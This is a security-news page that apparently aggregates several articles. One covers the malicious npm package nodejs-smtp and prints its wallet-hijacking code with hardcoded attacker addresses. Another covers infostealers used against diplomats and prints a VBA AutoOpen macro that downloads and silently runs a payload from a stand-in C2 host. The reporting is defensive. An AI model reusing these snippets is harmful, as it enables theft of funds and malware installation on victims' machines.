MediaTek today published its September 2025 Product Security Bulletin, disclosing and remediating a series of critical and moderate vulnerabilities in its modem and system components. The announcement highlights that all affected device OEMs have already received patches for at least two months, and there is currently no evidence of any exploit in the wild. According […]
A concerning surge in malicious domain registrations designed to exploit the upcoming 2026 FIFA World Cup, with threat actors already positioning themselves more than a year before the tournament begins. A comprehensive investigation by PreCrime Labs, the threat research division of BforeAI, has revealed that cybercriminals are systematically registering fraudulent domains to capitalize on the […]
Microsoft has opened the Release Preview Channel to Windows Insiders for the forthcoming Windows 11, version 25H2 (Build 26200.5074) enablement package (eKB), offering an early look at this year’s annual feature update.
Insiders can now opt in via Windows Update’s “seeker” experience, with general availability slated for later in the calendar year.
Key Takeaways 1. Windows 11 25H2 (Build 26200.5074) via enablement package. 2. Drops PowerShell 2.0/WMIC, adds UI/performance tweaks, app removal controls. 3. Install now in Release Preview.
Streamlined Delivery via Enablement Package
Windows 11, version 25H2, leverages a shared servicing branch with its predecessor, version 24H2, meaning both releases share the same cumulative updates while feature activation is controlled through an enablement package (eKB).
This enables Microsoft to deliver new features and enhancements through its continuous innovation pipeline without requiring a full OS reinstall.
Once Build 26200.5074 is installed, future monthly cumulative updates will arrive through the standard servicing channel, simplifying update management for both home and enterprise users.
Key delivery details:
Enablement package (eKB) model for rapid feature toggling
Shared servicing branch with Windows 11, version 24H2
Continuous innovation via monthly cumulative updates
The 25H2 preview introduces several notable feature enhancements along with select deprecations:
PowerShell 2.0 and Windows Management Instrumentation command-line (WMIC) have been removed, aligning with Microsoft’s move toward modern management tooling such as PowerShell 7 and Windows Management Infrastructure (WMI) APIs.
IT administrators on Enterprise and EDU devices can now remove select pre-installed Microsoft Store apps via Group Policy or MDM CSP policies, granting greater control over default app footprints.
Visual refinements to the Start menu and taskbar behaviors, including updated animations and improved drag‐and‐drop support.
Kernel and scheduler optimizations aimed at reducing latency for foreground applications.
Commercial* customers can validate and deploy the preview build across organizational devices via Windows Update for Business (WUfB), Windows Server Update Services (WSUS), or Azure Marketplace.
Pre-release feature updates can also be managed using Windows as a Service (WaaS) deployment methods, documented by Microsoft.
Insider Preview Installation
Windows Insiders on PCs meeting Windows 11 hardware requirements can navigate to Settings → Windows Update and select “Download and install” under Optional updates to get Build 26200.5074.
Windows 11 version 25H2
After installation, devices remain enrolled in the Release Preview Channel and will continue to receive cumulative servicing updates automatically.
For organizations seeking offline media, ISO files for version 25H2 will be published next week on the Windows Insider ISO download page.
Should any issues arise during deployment or testing, IT admins can open support cases through Microsoft Support for Business.
Commercial devices are defined as non-Home editions managed by IT or joined to enterprise domains.
Continuous testing and feedback from the Windows Insider Program community ensure a polished release when Windows 11, version 25H2, reaches general availability later this year.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
Salesforce has published a comprehensive forensic investigation guide aimed at empowering organizations to detect, analyze, and remediate security incidents within their Salesforce environments. The new guide distills best practices across three critical areas: activity logs, user permissions, and backup data—providing a structured framework to answer key questions such as “What did a specific user do […]
An Android malware tracker named SikkahBot, active since July 2024 and explicitly targeting students in Bangladesh. Disguised as applications from the Bangladesh Education Board, SikkahBot lures victims with promises of scholarships, coerces them into sharing sensitive information, and requests high-risk permissions. Once installed, it harvests personal and financial data, intercepts SMS messages, abuses the Accessibility […]
A growing wave of sophisticated attacks is turning macOS’s built-in security defenses into avenues for malware distribution, according to recent security research. As macOS continues to gain market share, cybercriminals are adapting their strategies to exploit even the most robust Apple protections. Analysts warn that relying solely on native safeguards may leave organizations vulnerable to […]
Security researchers at Socket.dev uncovered a sophisticated supply chain attack in late August 2025 leveraging a malicious npm package named nodejs-smtp, which masquerades as the widely used email library nodemailer, boasting approximately 3.9 million weekly downloads.
At first glance, nodejs-smtp operates identically to its legitimate counterpart, supplying a familiar API and successfully dispatching emails.
This deceptive functionality serves as a Trojan horse, engaging quietly in covert operations that prey on desktop cryptocurrency wallets installed on Windows systems.
Malicious package (Source – Socket.dev)
As organizations continued to integrate open-source dependencies into their development pipelines, attackers recognized the potency of import-time tampering.
Socket.dev analysts noted that upon import, nodejs-smtp immediately invokes an Electron-based payload designed to infiltrate wallets such as Atomic Wallet and Exodus.
By unpacking the wallet’s app.asar archive, replacing a critical vendor bundle with malicious code, and then repackaging the archive, the attacker ensures persistence and stealth.
Following this manipulation, any transaction initiated by the compromised wallet is rerouted, substituting the intended recipient address with one controlled by the threat actor.
Socket.dev analysts further identified that the threat actor, operating under the npm alias nikotimon, embeds hardcoded wallet addresses directly into the injected payload.
These addresses include Bitcoin, Ethereum, Tether (both ERC-20 and TRC-20), XRP, and Solana, facilitating multichain theft.
Although initial download counts for nodejs-smtp were relatively low—approximately 342 at the time of discovery—the potential for widespread compromise remains high given nodemailer’s ubiquity in production environments.
In light of these findings, developers and security teams are urged to adopt rigorous supply chain defenses.
Recommended measures include real-time analysis of side-effect imports, strict enforcement of code-review policies for new dependencies, and deployment of automated tooling to flag archive-manipulation patterns during package installation.
The risk is amplified by the fact that build pipelines and continuous integration systems are unlikely to detect such tampering when dependencies appear functionally correct.
Infection Mechanism and Persistence Tactics
Delving deeper into nodejs-smtp’s infection strategy reveals a two-stage process that exploits Electron’s packaging format.
In the first stage, the package’s lib/engine/index.js script executes immediately upon import:-
This routine unpacks the wallet archive, overwrites the vendor bundle with the malicious payload a.js, and repackages the integrity-checked archive to mask traces.
Upon the next wallet launch, a.js intercepts transaction construction and replaces the recipient address, ensuring every outgoing payment is diverted:
// lib/engine/a.js
async sendCoins() {
if (await this.validatePassword()) {
if (this.coin.ticker === 'BTC')
this.inputs.address = '17CNLs7rHnnBsmsCWoTq7EakGZKEp5wpdy';
else if (this.coin.ticker === 'ETH' || this.coin.ticker === 'USDT')
this.inputs.address = '0x26Ce898b746910ccB21F4C6316A5e85BCEa39e24';
// Additional mappings for TRX-USDT, XRP, SOL omitted
}
}
By executing during import, nodejs-smtp avoids detection by static scanners that only inspect function calls at runtime. This persistent, import-time hook highlights the evolving threat landscape within open-source ecosystems, underscoring the need for supply chain–aware security measures.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
A critical vulnerability in the IBM Watsonx Orchestrate Cartridge for IBM Cloud Pak for Data has been disclosed, enabling blind SQL injection attacks that could compromise sensitive data. Tracked as CVE-2025-0165, this flaw allows authenticated attackers to inject malicious SQL statements, potentially leading to unauthorized data access, manipulation, or deletion in the back-end database. IBM’s Watsonx platform offers advanced […]
Critical vulnerabilities in Sitecore Experience Platform allow attackers to achieve complete system compromise through a sophisticated attack chain combining HTML cache poisoning with remote code execution capabilities.
These flaws also enable attackers to enumerate cache keys and configuration details via the exposed ItemServices API, streamlining targeted exploitation.
Key Takeaways 1. CVE-2025-53693 lets attackers inject HTML via AddToCache. 2. CVE-2025-53691 abuses BinaryFormatter.Deserialize() for full code execution. 3. CVE-2025-53694 exposes cache key details, aiding targeted attacks.
Sitecore Experience Platform Vulnerabilities
The security research firm watchTowr Labs has identified three major vulnerabilities in Sitecore Experience Platform 10.4.1 that can be chained together for a devastating effect.
The primary vulnerability, CVE-2025-53693, enables HTML cache poisoning through unsafe reflection mechanisms in the XamlPageHandlerFactory handler.
The attack exploits the AjaxScriptManager.DispatchMethod() function, which uses reflection to dynamically invoke methods based on user-supplied parameters.
Attackers can target the vulnerable endpoint at /-/xaml/Sitecore.Shell.Xaml.WebControl with specially crafted POST requests containing malicious __PARAMETERS and __SOURCE values.
The core exploitation occurs through the AddToCache(string, string) method in Sitecore.Web.UI.WebControl, allowing attackers to inject arbitrary HTML into Sitecore’s cache system. A sample exploit request demonstrates the simplicity of the attack:
The second critical vulnerability, CVE-2025-53691, provides the pathway from cache poisoning to full remote code execution through insecure deserialization in the BinaryFormatter.Deserialize() method.
This vulnerability exists in the Sitecore.Convert.Base64ToObject() function, which processes base64-encoded objects without proper validation.
The attack chain leverages the ConvertToRuntimeHtml pipeline, specifically targeting iframe elements with embedded serialized payloads.
When the FixHtmlPage control processes malicious HTML containing iframe tags with id and value attributes, it triggers the vulnerable deserialization path.
Additionally, CVE-2025-53694 exposes sensitive information through the ItemServices API, enabling attackers to enumerate cache keys and system configurations.
This vulnerability allows unauthorized access to Sitecore item metadata, including caching settings and device configurations, facilitating targeted cache poisoning attacks.
CVE
Title
Severity
CVE-2025-53693
HTML Cache Poisoning
High
CVE-2025-53691
Deserialization Remote Code Exec.
Critical
CVE-2025-53694
ItemServices Metadata Disclosure
High
Sitecore has released patches for these vulnerabilities in June and July 2025.
Organizations using Sitecore Experience Platform should immediately apply the available security updates and review their ItemServices API exposure to prevent exploitation of these critical security flaws that affect thousands of enterprise installations worldwide.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
Infostealer malware, initially designed to indiscriminately harvest credentials from compromised hosts, has evolved into a potent weapon for state-sponsored Advanced Persistent Threat (APT) groups.
Emerging in early 2023, families such as RedLine, Lumma, and StealC quickly proliferated across phishing campaigns and malicious downloads.
These infostealers cast wide nets, siphoning browser data, cookies, and system information, but recent intelligence reveals a troubling shift: stolen credentials are now being weaponized for highly targeted espionage operations.
The primary attack vectors for infostealers remain spear-phishing emails laced with macro-enabled documents or fake software installers.
Victims receive a Word attachment with a VBA macro that, when enabled, downloads the stealer payload from a command-and-control (C2) server.
Upon execution, the malware locates and exfiltrates stored credentials for email, VPN, and corporate SSO portals.
Infostealers analysts noted that compromised diplmatic credentials from multiple Ministries of Foreign Affairs have appeared in darknet dumps, providing authenticated access to high-value targets.
Impact assessments indicate that once APT groups gain valid diplomatic mailbox credentials—often via Infostealer infections—they can craft near-indistinguishable spear-phishing campaigns.
These campaigns bypass traditional detection by leveraging trusted sender reputations and valid TLS certificates.
By mid-2025, Hudson Rock’s threat intelligence platform detected over 1,400 compromised users at Qatar’s MFA and hundreds more across Saudi Arabia, South Korea, and the UAE, underscoring the global scale of this threat.
In one high-profile incident, a compromised Omani embassy account in Paris was used to relay malicious invites to UN officials. The email contained a Word document with a “sysProcUpdate” macro that executed the following VBA code snippet:
Sub AutoOpen()
Dim objXML As Object
Set objXML = CreateObject("MSXML2.XMLHTTP")
objXML.Open "GET", "https://malicious.c2.server/payload.exe", False
objXML.Send
If objXML.Status = 200 Then
With CreateObject("ADODB.Stream")
.Type = 1
.Open
.Write objXML.responseBody
.SaveToFile Environ("TEMP") & "\update.exe", 2
End With
Shell Environ("TEMP") & "\update.exe", vbHide
End If
End Sub
Infostealers researchers identified that this persistence mechanism ensures repeat execution even after system reboots, facilitating long-term access.
Infection Mechanism
Delving deeper into the infection mechanism, infostealers exploit user trust and insufficient endpoint controls.
After initial compromise via phishing, the payload leverages common Windows APIs—such as CryptUnprotectData—to decrypt stored credentials from browsers and the Windows Credential Manager.
The exfiltration module then packages harvested data into encrypted blobs and transmits them over HTTPS to evade intrusion detection systems.
Once credentials reach the attacker’s infrastructure, APT groups use them as legitimate logins, bypassing multi-factor authentication in cases where only user-pass credentials are enforced.
By embedding the malware within routine-looking documents and mimicking legitimate maintenance tasks, infostealers maintain a low-and-slow profile, making detection exceptionally challenging.
This seamless exploitation of credential theft for targeted campaigns marks a worrying evolution in cyber-espionage tactics.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.